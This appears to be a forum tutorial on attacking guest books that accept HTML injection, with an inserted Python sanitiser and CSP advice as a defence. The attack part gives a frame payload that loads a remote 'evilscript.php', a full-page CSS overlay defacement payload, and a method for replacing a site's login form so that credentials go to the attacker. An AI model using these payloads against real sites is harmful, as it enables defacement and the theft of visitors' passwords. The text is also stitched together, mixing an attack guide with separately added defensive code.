So you have found a guest book which allows HTML injection. What now? What can you do?
So we know that we can enter HTML into the page. Chances are that if the owner hasn't stopped you putting HTML into the page, they won't have stopped you putting PHP into it either (this will only work if the website is hosted on a host which has PHP installed for its users; most hosts allow PHP pages, I believe).
But what if you can't inject PHP into the guest book?
OK, so you can't inject PHP directly into the guest book. Unlucky.
But it's not the end of the world. Let's think through HTML and what we might be able to use here: what allows us to put things into a webpage without the processing being done on that website?
IFRAME, FRAME, EMBED, APPLET
FRAME, IFRAME
Let's say you want to get a PHP page onto a website which only accepts HTML, so let's give it some HTML.
Code:
<frame src="http://www.yoursite.org/evilscript.php">
Now what does this do?
It creates an area on the page (its size can be set with the height and width attributes) which shows the content of the page you have pointed it at (in this case http://www.yoursite.org/evilscript.php).
Please note that all processing of information is done where that page is hosted.
EMBED, APPLET
Now, for all you clever clogs who can write things in Java, Flash etc.: you could write something in that language which gets information for you or performs some other task (I'm not going to go into a lot of detail, as I don't know Java, Flash or what you are able to do with them).
Please note that all processing of information is done where the embedded object is hosted.
OK, we can put things onto the website, but you can't really do much to the website itself, can you? You can't deface it or get passwords.
Well, we can, but this involves another element of HTML: STYLE.
This defines how something is displayed on a page, so you can write a style to make anything inside bold tags (<b>) use the Arial font with a blue colour, or something like that.
Wow, we can make the thing look nice, but that doesn't help us get passwords or deface the website.
I'll start with defacing the website.
There are a couple of things that style can do which are very useful...
Z-INDEX: this defines which layer of the page your information is on.
The default level is 0; this is the original webpage.
1 is above 0, so if you set something to z-index = 1 it will be above the information on level 0, which is the original webpage.
-1 is below 0, so if you set something to z-index = -1 it will be below the information on level 0, which means what you put there would be hidden behind the original website.
POSITION: this defines where on the page the element will be displayed. Here I will only go into absolute positioning, but there is also relative positioning.
With this you define exactly where you want something to be placed. There are two parameters to absolute positioning, top and left: how far from the top of the browser area you want something, and how far from the left.
HEIGHT and WIDTH: these define what size something is.
Now let's combine all those together. What would happen if you set...
z-index to 1
position top = 0
position left = 0
height = 100%
width = 100%
on something?
Well, it would cover the entire page.
That would be very useful for defacing the website.
Here is some example code of what something like this would look like.
Code:
<style>
#elem
{
z-index: 1;
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
background-color: black;
color: red;
}
</style>
<div id=elem>
<p align=center>
<b>You have been Hacked...<br>
By Me<br></b>
</p>
</div>
But what about getting passwords?
Well, if you can cover their web page with your own, maybe you can take their source code, put that into what has been given above, and change the form which allows them to log in so that it sends you the information instead. Obviously this is easy to spot, so you will have to think of ways of changing this method so you don't make it obvious what has just happened.
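The server-side fix for the guest book itself, as an added example that is not code from the original post: an allowlist sanitiser that keeps only a few formatting tags (an assumption about what the guest book needs), strips every attribute, drops style and script bodies, and shows any other tag, including the frame, embed, div and form tags discussed above, as literal text.

```python
import html
from html.parser import HTMLParser

# Assumption: the guest book only needs basic formatting. These tags are kept
# (with every attribute stripped); any other tag is shown as literal text.
ALLOWED_TAGS = {"b", "i", "p", "br"}
# CSS and script bodies are removed outright rather than re-displayed as text.
DROP_CONTENT = {"style", "script"}


class GuestbookSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitised output fragments
        self.open_tags = []  # allowed tags still awaiting a close tag
        self.dropping = 0    # > 0 while inside <style> or <script>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropping += 1
        elif self.dropping:
            return
        elif tag in ALLOWED_TAGS:
            # No attributes survive, so style=/id= cannot build a z-index overlay.
            self.out.append(f"<{tag}>")
            if tag != "br":
                self.open_tags.append(tag)
        else:
            # frame, iframe, embed, applet, div, form, ... become visible text.
            self.out.append(html.escape(self.get_starttag_text()))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
        elif self.dropping:
            return
        elif tag in ALLOWED_TAGS:
            if tag in self.open_tags:  # stray close tags are simply dropped
                self.open_tags.remove(tag)
                self.out.append(f"</{tag}>")
        else:
            self.out.append(html.escape(f"</{tag}>"))

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(html.escape(data, quote=False))


def sanitize_entry(entry: str) -> str:
    p = GuestbookSanitizer()
    p.feed(entry)
    p.close()
    # Close anything left open so one entry cannot swallow the rest of the page.
    return "".join(p.out) + "".join(f"</{t}>" for t in reversed(p.open_tags))
```

As defence in depth, a Content-Security-Policy response header with `frame-src 'none'; object-src 'none'` and a `style-src` that omits `'unsafe-inline'` stops injected frames, embeds/applets and inline styles from taking effect even when a filter is bypassed.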
Practicing HTML Injection/XSS
If anyone is interested in practicing what I have been talking about here, on my website I have created an area (completely secure) which will allow you to try this against different levels of filtering.
Each user has their own area (which only that user can access), so there is no worry about using it and then finding someone has stolen your information.
The website is Learn2Hack.Net.
You need to be a member of Learn2Hack in order to access the practice area.
You will need to go to "Practice Area's", then to "XSS", then choose either Guest book 1 (which has a small amount of filtering) or Guest book 2 (which has more filtering).